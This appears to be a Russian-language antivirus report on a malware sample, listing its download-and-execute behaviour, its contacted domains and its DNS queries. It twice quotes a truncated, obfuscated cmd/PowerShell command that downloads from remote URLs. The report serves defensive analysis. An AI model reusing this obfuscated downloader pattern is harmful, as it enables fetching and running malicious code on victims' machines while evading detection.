Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $HTTP29='Concrete14';$Rubber19=new-object Net.WebClient;$Track45='http://www.kl###en-gids.nl/xzMPGNb_wYmswEnQ_ugnZr@http://otkachka.novosi...
Сетевая активность
Подключается к
- 'kl###en-gids.nl':80
- 'kl###en-gids.nl':443
TCP
- 'kl###en-gids.nl':443
- 'sh##gen.ru':443
UDP
- DNS ASK kl###en-gids.nl
- DNS ASK ot#####a.novosibirsk.ru
- DNS ASK bi####ricsystems.ru
- DNS ASK sh##gen.ru
- DNS ASK hi####ass-store.co
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $HTTP29='Concrete14';$Rubber19=new-object Net.WebClient;$Track45='http://www.kl###en-gids.nl/xzMPGNb_wYmswEnQ_ugnZr@http://otkachka.novosi...' (со скрытым окном)
